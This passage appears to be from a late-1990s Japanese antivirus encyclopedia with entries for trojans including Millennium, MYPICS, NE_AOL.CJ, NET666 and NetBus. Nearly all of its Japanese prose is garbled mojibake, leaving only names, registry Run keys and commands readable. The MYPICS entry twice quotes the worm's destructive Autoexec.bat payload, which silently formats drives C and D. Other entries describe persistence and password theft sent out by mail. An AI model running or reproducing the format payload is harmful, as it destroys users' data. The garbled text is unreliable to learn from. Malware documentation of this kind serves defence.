¡¼¥â¥¸¥å¡¼¥ë¤ò»ý¤Ä¥Þ¥·¥ó¤ËÂФ·¤Æ°Ê²¼¤ÎÁàºî¤ò¹Ô¤¦¤³¤È ¤¬¤Ç¤­¤ë -¡¡Server Control– ¥·¥ã¥Ã¥È¥À¥¦¥óޤºÆµ¯Æ°Ž¤¥í¥°¥ª ¥Õޤ¥Í¥Ã¥È¥ï¡¼¥¯¤ÎÀÚÃÇŽ¤MS-DOS¥â¡¼¥É¤ÇºÆµ¯Æ° -¡¡Server Spy Control- ¥µ¡¼¥Ð¡¼¥â¥¸¥å¡¼¥ë¤òÊĤ¸¤ëޤµ¯ ư¤¹¤ëޤ¥Þ¥·¥ó¤«¤éºï½ü¤¹¤ë -¡¡CD Rom Control- ÊĤ¸¤ëޤ³«¤¯Ž¤CD-ROM¥É¥é¥¤¥Ð¡¼¤ò¥³¥ó ¥È¥í¡¼¥ë¤¹¤ë -¡¡Ctrl+Alt+Del Control- ¥­¡¼¥Ü¡¼¥É¤ÎCtrlޤAltޤDel ¥­ ¡¼¤òÁà¤ë -¡¡Cap and Number lock Control- ¥­¡¼¥Ü¡¼¥É¤ÎCaps Lock ¤ÈNumber lock¤òÁà¤ë¤³¤È¤¬¤Ç¤­¤ë -¡¡Mouse Control–¡¡¥Þ¥¦¥¹¤Î¥À¥Ö¥ë¥¯¥ê¥Ã¥¯¥¹¥Ô ¡¼¥É¤äÁᤵ¤Î¥³¥ó¥È¥í¡¼¥ë -¡¡Cursor Control- ¥ê¥â¡¼¥È¥³¥ó¥Ô¥å¡¼¥¿¡¼¤Î¥«¡¼¥½¥ë¤ò ±£¤¹/ɽ¼¨¤¹¤ë -¡¡File Control– ¥Õ¥¡¥¤¥ë¤òºï½ü/ºîÀ®/ÄɲÃ/¥¯¥é ¥¤¥¢¥ó¥È¤ËÁ÷¿®¤¹¤ë/¥Ñ¥¹¥ï¡¼¥É¤òÀßÄꤹ¤ë

TROJ_MILLEN_SVR


̾¡¡¡¡¾Î:TROJ_MILLEN_SVR

ÂС¡¡¡¾Ý:Win95 / Win98 / Win NT

¥¦¥¤¥ë¥¹¥µ¥¤¥º:48,128 bytes

ȯ¸«Æü:1998/12

¾Ü¡¡¡¡ºÙ:NetBus¥¦¥¤¥ë¥¹¤äBackOrifice¥¦¥¤¥ë¥¹¤È»÷¤¿¡¢
¥Í¥Ã¥È¥ï¡¼¥¯¾å¤Î¥Ï¥Ã¥­¥ó¥°¥Ä¡¼¥ë¤Ç¤¢¤ë¡£¥µ¡¼¥Ð¡¼/¥¯¥é ¥¤¥¢¥ó¥È·¿¤Î¥×¥í¥°¥é¥à¤Çޤ¥µ¡¼¥Ð¡¼¥â¥¸¥å¡¼¥ë¤ÏTROJ_ MILLEN_SVR,¥¯¥é¥¤¥¢¥ó¥È¥â¥¸¥å¡¼¥ë¤ÏTROJ_MILLEN_CLNT¤È ¤·¤Æ¸¡½Ð¤µ¤ì¤ëŽ¡ ¥Õ¥¡¥¤¥ë¤ò¼Â¹Ô¤¹¤ë¤Èޤ<¥ë¡¼¥È>\WINDOWS\SYSTEM¥Ç¥£¥ì¥¯ ¥È¥ê¤Ë¡Éreg66.EXE¡É¤È¤¤¤¦Ì¾Á°¤Ç¼«Ê¬¼«¿È¤ÎÊ£À½¤òºîÀ®¤¹
¤ëŽ¡ ¤µ¤é¤Ë¡Èrun=c:\windows\system\reg66.exe¡É ¤È¤¤¤¦
¥Æ¥­¥¹¥È¤ò WIN.INI ¥Õ¥¡¥¤¥ë¤ËÁÞÆþ¤·Ž¤µ¯Æ°»þ¤Ëɬ¤º¤³¤Î ¥È¥í¥¤¤ÎÌÚÇϤ¬¼Â¹Ô¤µ¤ì¤ë¤è¤¦¤ËÀßÄꤹ¤ëŽ¡ ¤³¤Î¥×¥í¥°¥é¥à¤¬¼Â¹Ô¤µ¤ìޤ¥¤¥ó¥¿¡¼¥Í¥Ã¥È¤ËÀܳ¤µ¤ì¤¿¥³ ¥ó¥Ô¥å¡¼¥¿¤Ø¤Î´¶À÷¤ËÀ®¸ù¤·¤¿¾ì¹ç¡¢¥Ï¥Ã¥«¡¼¤Ï¥¯¥é¥¤¥¢ ¥ó¥È¥×¥í¥°¥é¥à(TROJ_MILLEN_CLNT)¤òÍøÍѤ·¤ÆŽ¤¤½¤Î¥Þ¥·¥ó ¤ÎIP¥¢¥É¥ì¥¹¤òÆþ¼ê¤·¡¢¤½¤Î¥³¥ó¥Ô¥å¡¼¥¿¤ò¤µ¤Þ¤¶¤Þ¤ËÁà ºî¤¹¤ë¤³¤È¤¬¤Ç¤­¤ë¡£

TROJ_MYPICS


̾¡¡¡¡¾Î:TROJ_MYPICS

ÊÌ¡¡¡¡Ì¾:W32.MYPICS.WORM, W32/MYPICS.WORM

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿,¥ï¡¼¥à

¥¦¥¤¥ë¥¹¥µ¥¤¥º:34,304 bytes

¾Ü¡¡¡¡ºÙ:TROJ_MYPICS ¤ÏE-mail¤òÍøÍѤ·¤Æ³È»¶¤¹¤ë¥á¥â
¥ê¾ïÃ󷿥¥à¤Ç¤¹¡£Windows 9x ¤È Windows NT ¾å¤Çưºî ¤·¡¢"Pics4You.exe"¤È¤¤¤¦ÅºÉÕ¥Õ¥¡¥¤¥ë¤ò¤Ä¤±¤Æ¼«Æ°Åª¤Ë ¥á¡¼¥ë¤òÁ÷¿®¤·¤Þ¤¹¡£¤Þ¤¿¡¢2000ǯ¤Ë¤Ê¤ë¤Èȯɤ·¡¢¥Ï ¡¼¥É¥Ç¥£¥¹¥¯¤ò¥Õ¥©¡¼¥Þ¥Ã¥È¤¹¤ë¤È¤¤¤¦Ç˲õ³èư¤ò¹Ô¤¤¤Þ ¤¹¡£
´¶À÷:
¤³¤Î¥ï¡¼¥à¤Ï"Pics4You.exe"¤È¤¤¤¦Ì¾¾Î¤Î¥Õ¥¡¥¤¥ë ¤¬ÅºÉÕ¤µ¤ì¤¿¥á¡¼¥ë¤È¤·¤Æ¥æ¡¼¥¶¡¼¤Î¸µ¤ËÆÏ¤­¤Þ¤¹¡£¤³¤Î ¥á¡¼¥ë¤Ï°Ê²¼¤Î¤è¤¦¤Ê¤â¤Î¤Ç¤¹¡£ ¥¿¥¤¥È¥ë ¤Ê¤· ËÜʸ "Here¡Çs some pictures for you!" źÉÕ¥Õ¥¡¥¤¥ë "Pics4You.exe" "Pics4You.exe"¤ò¼Â¹Ô¤¹¤ë¤È¡¢°ì¸«²¿¤âµ¯¤³¤é¤º¤Ë½ªÎ»¤· ¤¿¤«¤Î¤è¤¦¤Ë¸«¤¨¤Þ¤¹¡£¤·¤«¤·¡¢¤³¤Î´Ö¤Ë¥ï¡¼¥à¤Ï¥á¥â¥ê ¤Ë¾ïÃó¤·¡¢Microsoft Outlook¤Î¥¢¥É¥ì¥¹¥ê¥¹¥ÈÆâ¤ÎºÇ½é¤Î 50¥¢¥É¥ì¥¹¤ËÂФ·¡¢¾åµ­¤Î¤è¤¦¤Ê¥á¡¼¥ë¤òÁ÷¿®¤·¤Þ¤¹¡£¤µ ¤é¤Ë¡¢C¥É¥é¥¤¥Ö¤Î¥ë¡¼¥È¤ËPics4You.Exe¤òºîÀ® ¤·¡¢¥ì¥¸¥¹¥È¥ê¤ò²þÊѤ·¤Æ¥·¥¹¥Æ¥à¤Îµ¯Æ°»þ¤Ëɬ¤º¤³¤Î¥ï ¡¼¥à¤¬¼Â¹Ô¤µ¤ì¤ë¤è¤¦¤ËÀßÄꤷ¤Þ¤¹¡£¤½¤·¤Æ InternetExplorer ¤Î¡É¥¹¥¿¡¼¥È¥Ú¡¼¥¸¡É¤ÎÀßÄê¤ò¡¢°Ê²¼¤Î URL¤Ë¾¡¼ê¤ËÊѹ¹¤·¤Æ¤·¤Þ¤¤¤Þ¤¹¡£
http://www.geocities.com/SiliconValley/Vista/8279
/index.html
Ç˲õ³èư:
¤³¤Î¥ï¡¼¥à¤Ï¥á¥â¥ê¤Ë¾ïÃ󤷤ƥ·¥¹¥Æ¥à¤ÎÆüÉÕ¤ò¥Á¥§¥Ã¥¯ ¤·¤Þ¤¹¡£2000ǯ¤Ë¤Ê¤ë¤È¡¢cbios.com¤È¤¤¤¦¥Õ¥¡¥¤ ¥ë¤òºîÀ®¤·¡¢¤³¤ì¤ò¼Â¹Ô¤·¤Þ¤¹¡£¤³¤Î¥Õ¥¡¥¤¥ë¤Ï¾®¤µ¤Ê¥× ¥í¥°¥é¥à¤Ç¡¢CMOS¤ò²þÊѤ·¤ÆChecksum ¤Î¥¨¥é¡¼¤¬µ¯¤³¤ë¤è ¤¦¤Ë¤·¤Þ¤¹¡£ ¤Þ¤¿Æ±»þ¤Ë¡¢°Ê²¼¤Î¥Æ¥­¥¹¥È¤ÇAutoexec.bat¤ò¾å½ñ¤­¤·¤Æ ¤·¤Þ¤¤¤Þ¤¹¡£ ctty nul
format d: /autotest /q /u

format c: /autotest /q /u
¤³¤Î¤¿¤á¡¢¼¡²ó¤Î¥Þ¥·¥óµ¯Æ°»þ(ÅŸ»ÅêÆþ»þ)¤Ë°Ê²¼¤Î¥á¥Ã ¥»¡¼¥¸¤¬É½¼¨¤µ¤ì¤Þ¤¹¡£ CMOS checksum is invalid ¤³¤ì¤Ï¤¢¤¿¤«¤âY2KÌäÂê¤Ë¤è¤ë¥¨¥é¡¼¤Ç¤¢¤ë¤è¤¦¤Ë¸«¤»¤«¤± ¤ë¤³¤È¤¬ÁÀ¤¤¤È¹Í¤¨¤é¤ì¤Þ¤¹¡£ µ¯Æ°»þ¤ÎCMOS checksum ¥¨¥é¡¼¤Ï´Êñ¤Ëľ¤¹¤³¤È¤¬¤Ç¤­¤Þ ¤¹¡£¤·¤«¤·¡¢¥æ¡¼¥¶¡¼¤¬CMOS¤òÀßÄꤷľ¤·¡¢µ¯Æ°¤¬Â³¹Ô¤µ ¤ì¤ë¤È¡¢Autoexec.bat¤¬¼Â¹Ô¤µ¤ì¡¢¥Ï¡¼¥É¥Ç¥£¥¹¥¯¤¬¥Õ¥© ¡¼¥Þ¥Ã¥È¤µ¤ì¤Æ¤·¤Þ¤¤¤Þ¤¹¡£ ¤¿¤À¤·¡¢¤³¤Î¥ï¡¼¥à¤ÏMicrosoft¤ÎVisual Basic¤Çµ­½Ò¤µ¤ì ¤Æ¤ª¤ê¡¢¼Â¹Ô¤Ë¤Ï¡¢MSVBVM50.DLL¤È¤¤¤¦Visual Basic¥é¥ó ¥¿¥¤¥à¡¦¥é¥¤¥Ö¥é¥ê¤¬¥¤¥ó¥¹¥È¡¼¥ë¤µ¤ì¤Æ¤¤¤ëɬÍפ¬¤¢¤ê ¤Þ¤¹¡£¤³¤ì¤¬¥¤¥ó¥¹¥È¡¼¥ë¤µ¤ì¤Æ¤¤¤Ê¤¤´Ä¶­¤Ç¤Ïưºî¤¹¤ë ¤³¤È¤Ï¤¢¤ê¤Þ¤»¤ó¡£
È÷¡¡¡¡¹Í:****¼êưºï½ü¼ê½ç
Ctrl-Alt-Del¥­¡¼¤ò²¡¤·¤Æ¡¢"MYPICS"¤È¤¤¤¦¥¿¥¹¥¯¤ò½ªÎ» ¤µ¤»¤Æ¤¯¤À¤µ¤¤¡£ ¥ì¥¸¥¹¥È¥ê¥¨¥Ç¥£¥¿¤òÍøÍѤ·¤Æ¡¢°Ê²¼¤Î¥ì¥¸¥¹¥È¥ê¥¨
¥ó¥È¥ê¤ÎÃÍC:\Pics4You.Exe¤òºï½ü¤·¤Æ¤¯¤À¤µ¤¤¡£
*Windows 9x HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\
CurrentVersion\Run= C:\Pics4You.Exe
*Windows NT HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\
Windows\Run= C:\Pics4You.Exe
autoexec.bat ¥Õ¥¡¥¤¥ë¤¬°Ê²¼¤Îµ­½Ò¤¬Ìµ¤¤¤«¤ò³Îǧ¤· ¤Æ¤¯¤À¤µ¤¤¡£¤³¤Î²þÊѤϡ¢¤³¤Î¥ï¡¼¥à¤Ë´¶À÷¤·¤¿¥·¥¹¥Æ¥à ¤ò2000ǯ¤Ëµ¯Æ°¤·¤¿¤È¤­¤Ë¹Ô¤ï¤ì¤Þ¤¹¡£¤â¤·¤³¤Îµ­½Ò¤¬¤¢ ¤ì¤Ð¥ª¥ê¥¸¥Ê¥ë¤ÎAutoexec.bat¤ÇÉü¸µ¤·¤Æ¤¯¤À¤µ¤¤¡£ ctty nul
format d: /autotest /q /u

format c: /autotest /q /u
CBIOS.COM ¤È¤¤¤¦¥Õ¥¡¥¤¥ë¤¬¤Ê¤¤¤«¤ò³Îǧ¤·¤Æ ¤¯¤À¤µ¤¤¡£¤³¤Î¥Õ¥¡¥¤¥ë¤Ï¤³¤Î¥ï¡¼¥à¤Ë´¶À÷¤·¤¿¥·¥¹¥Æ¥à ¤ÎÆüÉÕ¤¬2000ǯ¤Ë¤Ê¤Ã¤¿¤È¤­¤ËºîÀ®¤µ¤ì¤Þ¤¹¡£¤â¤·¤³¤Î¥Õ ¥¡¥¤¥ë¤¬¤¢¤ì¤Ðºï½ü¤·¤Æ¤¯¤À¤µ¤¤¡£ Pics4you.exe ¤È¤¤¤¦¥Õ¥¡¥¤¥ë¤¬¥·¥¹¥Æ¥à¤Ë¤Ê ¤¤¤«¡¢¸¡º÷¤·¤Æ¤¯¤À¤µ¤¤¡£¤â¤·¤¢¤ì¤Ð¤³¤ì¤òºï½ü¤·¤Æ¤¯¤À ¤µ¤¤¡£ ***¥ì¥¸¥¹¥È¥ê¤òÊѹ¹¤¹¤ë¤Î ¤ÏÈó¾ï¤Ë¥Ç¥ê¥±¡¼¥È¤Ê¹Ô°Ù¤Ç¤¢¤êޤ¸í¤Ã¤¿Áàºî¤ò¹Ô¤¦¤Èޤ¥· ¥¹¥Æ¥à¤Ë»½ý¤òÍ¿¤¨¤ë²ÄǽÀ­¤¬¤¢¤ê¤Þ¤¹Ž¡¥ì¥¸¥¹¥È¥ê¤Î½¤Éü ¤Ï¿µ½Å¤Ë¹Ô¤Ã¤Æ¤¯¤À¤µ¤¤Ž¡

TROJ_NE_AOL.CJ


̾¡¡¡¡¾Î:TROJ_NE_AOL.CJ

ÊÌ¡¡¡¡Ì¾:APSTROJAN.CJ, NE_AOL_TROJAN.CJ, PWSTEAL.
TROJAN, TROJAN.AOL.PS.CJ
ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

ÂС¡¡¡¾Ý:Windows

¥¦¥¤¥ë¥¹¥µ¥¤¥º:204K, 166K, 914K, 513K

¾Ü¡¡¡¡ºÙ:¥æ¡¼¥¶¤Î¥Ñ¥¹¥ï¡¼¥É¤òÅð¤à¥È¥í¥¤¤ÎÌÚÇϤǤ¹¡£
¤³¤Î¥¦¥¤¥ë¥¹¤Ï¡¢WINDOWS¥Ç¥£¥ì¥¯¥È¥ê¤Ë¥¦¥¤¥ë¥¹¥Õ¥¡¥¤¥ë ¤Î¥³¥Ô¡¼¤ÈSYSTRAY.INI¥Õ¥¡¥¤¥ë¤òºîÀ®¤·¤Þ¤¹¡£ SYSTRAY.INI¤ÎÆâÍÆ¤Ï°Ê²¼¤ÎÄ̤ê¤Ç¤¹¡£ [System]
Path=C:\WINDOWS\????????.EXE
????????.EXE¤Ï¥ª¥ê¥¸¥Ê¥ë¥Õ¥¡¥¤¥ë¤Î¥Õ¥¡¥¤¥ë̾¤Ç¤¹¡£ ¤µ¤é¤Ë¡¢WIN.INI¤ÎÃæ¤Ë¼¡¤Îµ­½Ò¤òÄɲä·¤Þ¤¹¡£ windows
load=C:\WINDOWS\????????.EXE
¤³¤Î¤¿¤á¡¢¥·¥¹¥Æ¥à¤¬µ¯Æ°¤¹¤ë¤¿¤Ó¤Ë¥È¥í¥¤¤ÎÌÚÇϤ¬¼Â¹Ô ¤µ¤ì¤ë¤³¤È¤Ë¤Ê¤ê¤Þ¤¹¡£ ¤³¤Î¥¦¥¤¥ë¥¹¤ÏSMTP¤òÍøÍѤ·¡¢¥Ñ¥¹¥ï¡¼¥É¤ò¥¦¥¤¥ë¥¹¤Îºî ¼Ô¤ËÁ÷¤ê¤Þ¤¹¡£
È÷¡¡¡¡¹Í:¤¹¤Ù¤Æ¤Î°¡¼ï¤ò¥Ñ¥¿¡¼¥óTROJ_NE_AOL.CJ¤Ç¸¡ÃÎ
¤·¤Þ¤¹¡£

TROJ_NET666


̾¡¡¡¡¾Î:TROJ_NET666

ÊÌ¡¡¡¡Ì¾:NET.666, SEMISOFT.59904, WIN32.HLLP.59904,
WIN32.SEMISOFT.59904
ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

¥¦¥¤¥ë¥¹¥µ¥¤¥º:59,904 bytes

ȯ¾ÍÃÏ:¥Ë¥å¡¼¥¸¡¼¥é¥ó¥É

¾Ü¡¡¡¡ºÙ:¼Â¹Ô¤¹¤ë¤ÈޤIP¥¢¥É¥ì¥¹¤ò¥Ë¥å¡¼¥¸¡¼¥é¥ó¥É¤Î¤¢
¤ë4¤Ä¤ÎIP¥¢¥É¥ì¥¹¤ËÁ÷¿®¤¹¤ëŽ¡¤½¤Î¸åޤ´¶À÷¤·¤¿¥Þ¥·¥ó¤Î¥Ý ¡¼¥È531¤¬³«¤«¤ìޤ¹¶·â¼Ô¤Î¿¯Æþ¤ò²Äǽ¤Ë¤¹¤ëŽ¡ -¥Þ¥·¥ó¤Îµ¯Æ°»þ¤Ë¤³¤Î¥È¥í¥¤¤ÎÌÚÇϤ¬¼Â¹Ô¤µ¤ì¤ë¤è¤¦¤Ëޤ °Ê²¼¤Î¥ì¥¸¥¹¥È¥ê¥­¡¼¤ËÅÐÏ¿¤¹¤ëŽ¡
Windows9x:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\ CurrentVersion\RunServices WINIPX=WINIPX.EXE
Windows NT:
HKEYT_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\ CurrentVersion\Winlogon Shell=Explorer.exe, WINIPX.EXE

TROJ_NETBUS.160


̾¡¡¡¡¾Î:TROJ_NETBUS.160

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

ÂС¡¡¡¾Ý:¤Ê¤·

¥¦¥¤¥ë¥¹¥µ¥¤¥º:N/A

ȯ¾ÍÃÏ:¥¹¥¦¥§¡¼¥Ç¥ó

ȯ¸«Æü:98/03

¾Ü¡¡¡¡ºÙ:¡Ý¥È¥í¥¤¤ÎÌÚÇÏ·¿¥×¥í¥°¥é¥à¤Ç¤¢¤ë¡£¥È¥í¥¤¤Î
ÌÚÇÏ¥×¥í¥°¥é¥à¤ÏľÀÜ¥·¥¹¥Æ¥à¤ËÇ˲õ³èư¤ò¹Ô¤¦¤¬¡¢´¶À÷ ³èư¤Ï¹Ô¤ï¤Ê¤¤¡£ ¡Ý¡¡¥Õ¥¡¥¤¥ë¤¬¼Â¹Ô¤µ¤ì¤ë¤È¡¢Windows OS¤Î¥¤¥ó¥¹¥È¡¼¥ë
¥Ç¥£¥ì¥¯¥È¥ê(Îã:C:\Windows)¤ÎÃæ¤Ë¥Õ¥¡¥¤¥ë¼«¿È¤ò¥³¥Ô
¡¼¤¹¤ëŽ¡¤Þ¤¿Ž¤¥ì¥¸¥¹¥È¥ê¤Î \\HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\ CurrentVersion\run¤ËÅÐÏ¿¤µ¤ìޤ¼¡²ó¥Þ¥·¥óµ¯Æ°»þ¤«¤é¼«Æ° Ū¤Ë¥×¥í¥°¥é¥à¤¬¼Â¹Ô¤µ¤ì¤ë¡£¥×¥í¥°¥é¥à¼Â¹ÔÃæ¤Ï¥Õ¥¡¥¤ ¥ë¤Îºï½ü¤¬¤Ç¤­¤Ê¤¤Ž¡
¾É¾õ:
-¡¡¥¯¥é¥¤¥¢¥ó¥È¥×¥í¥°¥é¥à¤È¥µ¡¼¥Ð¡¼¥×¥í¥°¥é¥à¤¬¤¢¤ëŽ¡ ¥µ¡¼¥Ð¥×¥í¥°¥é¥à¤ò¥¤¥ó¥¹¥È¡¼¥ë¤·¤¿°­°Õ¤ò»ý¤ÄÂè»°¼Ô¤¬ ¥¯¥é¥¤¥¢¥ó¥È¥×¥í¥°¥é¥à¤ò狼¤ËÁ÷¤êޤ¼Â¹Ô¤µ¤»¤ë¤³¤È¤Ë¤è ¤Ã¤ÆŽ¤Áê¼ê¤Î¥Þ¥·¥ó¤Ë¥ê¥â¡¼¥È¥¢¥¯¥»¥¹¤·¼«Í³¤ËÁà¤ë¤³¤È¤¬ ¤Ç¤­¤ëŽ¡
È÷¡¡¡¡¹Í:-¡¡¥¯¥é¥¤¥¢¥ó¥È¥×¥í¥°¥é¥à̾¤Ï"NetBus.exe"Ž¡
¥µ¡¼¥Ð¡¼¤Î¥×¥í¥°¥é¥à̾¤Ï"Patch.exe"¤À¤¬Ž¤¤³¤Î̾Á°¤Ï¼« ͳ¤ËÊѹ¹¤¹¤ë¤³¤È¤¬¤Ç¤­¤ë¤Î¤ÇޤÁ÷¤é¤ì¤¿Áê¼ê¤Ë¤½¤ì¤È¤ÏÃÎ ¤é¤º¤Ë¼Â¹Ô¤µ¤»¤ë¤³¤È¤¬¤Ç¤­¤ëŽ¡
ÂнèÊýË¡:
¥¦¥¤¥ë¥¹¥×¥í¥°¥é¥à¼Â¹Ô»þ¤Ëޤ¼«Æ°µ¯Æ°¤ÎÀßÄê¤ò¹Ô¤¦¤¿¤áޤ ¥¦¥¤¥ë¥¹¥Ð¥¹¥¿¡¼¤Þ¤¿¤ÏWINDOWS¾å¤«¤é¤Ï¥Õ¥¡¥¤¥ë¤òºï½ü¤¹ ¤ë¤³¤È¤Ï¤Ç¤­¤Ê¤¤Ž¡°Ê²¼¤ÎÊýË¡¤Ç¼«Æ°µ¯Æ°¤ò²ò½ü¤·Ž¤¥Õ¥¡¥¤ ¥ë¤òºï½ü¤¹¤ëŽ¡ Ãí°Õ)¥¯¥é¥¤¥¢¥ó¥È¥×¥í¥°¥é¥à¤Î̾¾Î¤Ï¼«Í³¤ËÊѹ¹¤Ç¤­¤ë¤Î ¤ÇÆÃÄê¤Ï¤Ç¤­¤Ê¤¤Ž¡¥ì¥¸¥¹¥È¥ê¤Ë¤Ï޳޲ŽÙ޽ŽÊŽÞ޽ŽÀް¤Ç¸¡½Ð¤µ¤ì¤¿ ¥Õ¥¡¥¤¥ë̾¤ÇÅÐÏ¿¤µ¤ì¤Æ¤¤¤ëŽ¡¤³¤³¤Ç¤Ï"PIC.EXE"¤ÇÀâÌÀ¤¹ ¤ëŽ¡ ¡üWINDOWS95¤Î¾ì¹ç ¥ì¥¸¥¹¥È¥ê¤Î\\HKEY_LOCAL_MACHINE\Software\Microsoft\ Windows\CurrentVersion\run¤ÎÃæ¤Î¥­¡¼
"PIC"¤òºï½ü¤¹¤ëŽ¡¤½¤Î¸åޤºÆµ¯Æ°¤·Ž¤C:\WINDOWS\PIC.EXE¤ò
ºï½ü¤¹¤ëŽ¡ ¡üWINDOWS98¤Î¾ì¹ç Ž¢¥¹¥¿¡¼¥ÈŽ£¢ªŽ¢¥×¥í¥°¥é¥àŽ£¢ªŽ¢¥¢¥¯¥»¥µ¥êŽ£¢ªŽ¢¥·¥¹¥Æ¥à¥Ä ¡¼¥ëŽ£¢ªŽ¢¥·¥¹¥Æ¥à¾ðÊ󎣤ò³«¤­Ž¤Ž¢¥Ä¡¼¥ëŽ£¢ªŽ¢¥·¥¹¥Æ¥àÀßÄê¥æ ¡¼¥Æ¥£¥ê¥Æ¥£Ž£¤ÎŽ¢¥¹¥¿¡¼¥È¥¢¥Ã¥×Ž£¥¿¥Ö¤òÁª¤ÖŽ¡¤³¤³¤Ëޤ"Pic "¤¬ÅÐÏ¿¤µ¤ì¤Æ¤¤¤ë¤Î¤Ç¤½¤Î¥Á¥§¥Ã¥¯¤ò¤Ï¤º¤¹Ž¡¤½¤Î¸åޤºÆµ¯
ư¤·Ž¤C:\WINDOWS\PIC.EXE¤òºï½ü¤¹¤ëŽ¡

TROJ_NETBUS.160.A


̾¡¡¡¡¾Î:TROJ_NETBUS.160.A

ÊÌ¡¡¡¡Ì¾:Backdoor.Netbus.160

¸À¡¡¡¡¸ì:±Ñ¸ì

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

ÂС¡¡¡¾Ý:Win32

¾Ü¡¡¡¡ºÙ:¥È¥í¥¤¤ÎÌÚÇÏ·¿¥×¥í¥°¥é¥à¤Ç¤¢¤ë¡£¥È¥í¥¤¤ÎÌÚ
ÇÏ¥×¥í¥°¥é¥à¤ÏľÀÜ¥·¥¹¥Æ¥à¤ËÇ˲õ³èư¤ò¹Ô¤¦¤¬¡¢´¶À÷³è ư¤Ï¹Ô¤ï¤Ê¤¤¡£ ¥×¥í¥°¥é¥à¥Õ¥¡¥¤¥ë¤¬¼Â¹Ô¤µ¤ì¤ë¤È¡¢¤³¤Î¥È¥í¥¤¤ÎÌÚÇϤώ¤
Windows OS¤Î¥¤¥ó¥¹¥È¡¼¥ë¥Ç¥£¥ì¥¯¥È¥ê(Îã:C:\Windows)¤Î
Ãæ¤Ë<¥ª¥ê¥¸¥Ê¥ë¥Õ¥¡¥¤¥ë̾>.EXEޤ KEYHOOK.DLL¤ÎÆó¤Ä¤Î¥Õ ¥¡¥¤¥ë¤òºîÀ®¤¹¤ëŽ¡¤Þ¤¿Ž¤¥ì¥¸¥¹¥È¥ê¤Î \\HKEY_LOCAL_ MACHINE\Software\Microsoft\Windows\CurrentVersion\run ¤ËÅÐÏ¿¤·Ž¤¼¡²ó¥Þ¥·¥óµ¯Æ°»þ¤«¤é¼«Æ°Åª¤Ë¥×¥í¥°¥é¥à¤¬¼Â¹Ô ¤µ¤ì¤ë¤è¤¦¤ËÀßÄꤹ¤ë¡£¥×¥í¥°¥é¥à¼Â¹ÔÃæ¤Ï¥Õ¥¡¥¤¥ë¤Îºï ½ü¤¬¤Ç¤­¤Ê¤¤Ž¡
»³²:
¡¡¥¯¥é¥¤¥¢¥ó¥È¥×¥í¥°¥é¥à¤È¥µ¡¼¥Ð¡¼¥×¥í¥°¥é¥à¤¬¤¢¤ëŽ¡¥µ ¡¼¥Ð¥×¥í¥°¥é¥à¤ò¥¤¥ó¥¹¥È¡¼¥ë¤·¤¿°­°Õ¤ò»ý¤ÄÂè»°¼Ô¤¬¥¯ ¥é¥¤¥¢¥ó¥È¥×¥í¥°¥é¥à¤ò狼¤ËÁ÷¤êޤ¼Â¹Ô¤µ¤»¤ë¤³¤È¤Ë¤è¤Ã ¤ÆŽ¤Áê¼ê¤Î¥Þ¥·¥ó¤Ë¥ê¥â¡¼¥È¥¢¥¯¥»¥¹¤·¼«Í³¤ËÁà¤ë¤³¤È¤¬¤Ç ¤­¤ëŽ¡
È÷¡¡¡¡¹Í:ÂнèÊýË¡:¥¦¥¤¥ë¥¹¥×¥í¥°¥é¥à¼Â¹Ô»þ¤Ëޤ¼«Æ°µ¯
ư¤ÎÀßÄê¤ò¹Ô¤¦¤¿¤áޤ¥¦¥¤¥ë¥¹¥Ð¥¹¥¿¡¼¤Þ¤¿¤ÏWINDOWS¾å¤« ¤é¤Ï¥Õ¥¡¥¤¥ë¤òºï½ü¤¹¤ë¤³¤È¤Ï¤Ç¤­¤Ê¤¤Ž¡°Ê²¼¤ÎÊýË¡¤Ç¼«Æ° µ¯Æ°¤ò²ò½ü¤·Ž¤¥Õ¥¡¥¤¥ë¤òºï½ü¤¹¤ëŽ¡ Ãí°Õ)¥¯¥é¥¤¥¢¥ó¥È¥×¥í¥°¥é¥à¤Î̾¾Î¤Ï¼«Í³¤ËÊѹ¹¤Ç¤­¤ë¤Î ¤ÇÆÃÄê¤Ï¤Ç¤­¤Ê¤¤Ž¡¥ì¥¸¥¹¥È¥ê¤Ë¤Ï޳޲ŽÙ޽ŽÊŽÞ޽ŽÀް¤Ç¸¡½Ð¤µ¤ì¤¿ ¥Õ¥¡¥¤¥ë̾¤ÇÅÐÏ¿¤µ¤ì¤Æ¤¤¤ëŽ¡¤³¤³¤Ç¤Ï"PATCH.EXE"¤ÇÀâÌÀ ¤¹¤ëŽ¡ ¡üWINDOWS95¤Î¾ì¹ç¥ì¥¸¥¹¥È¥ê¤Î\\HKEY_LOCAL_MACHINE\ Software\Microsoft\Windows\CurrentVersion\run¤ÎÃæ¤Î¥­
¡¼ "PATCH"¤òºï½ü¤¹¤ëŽ¡¤½¤Î¸åޤºÆµ¯Æ°¤·Ž¤C:\WINDOWS\
PATCH.EXE¤òºï½ü¤¹¤ëŽ¡ ¡üWINDOWS98¤Î¾ì¹çŽ¢¥¹¥¿¡¼¥ÈŽ£¢ªŽ¢¥×¥í¥°¥é¥àŽ£¢ªŽ¢¥¢¥¯¥»¥µ ¥êŽ£¢ªŽ¢¥·¥¹¥Æ¥à¥Ä¡¼¥ëŽ£¢ªŽ¢¥·¥¹¥Æ¥à¾ðÊ󎣤ò³«¤­Ž¤Ž¢¥Ä¡¼¥ëŽ£ ¢ªŽ¢¥·¥¹¥Æ¥àÀßÄê¥æ¡¼¥Æ¥£¥ê¥Æ¥£Ž£¤ÎŽ¢¥¹¥¿¡¼¥È¥¢¥Ã¥×Ž£¥¿¥Ö ¤òÁª¤ÖŽ¡¤³¤³¤Ëޤ"Pic"¤¬ÅÐÏ¿¤µ¤ì¤Æ¤¤¤ë¤Î¤Ç¤½¤Î¥Á¥§¥Ã¥¯¤ò
¤Ï¤º¤¹Ž¡¤½¤Î¸åޤºÆµ¯Æ°¤·Ž¤C:\WINDOWS\PATCH.EXE¤òºï½ü¤¹¤ë
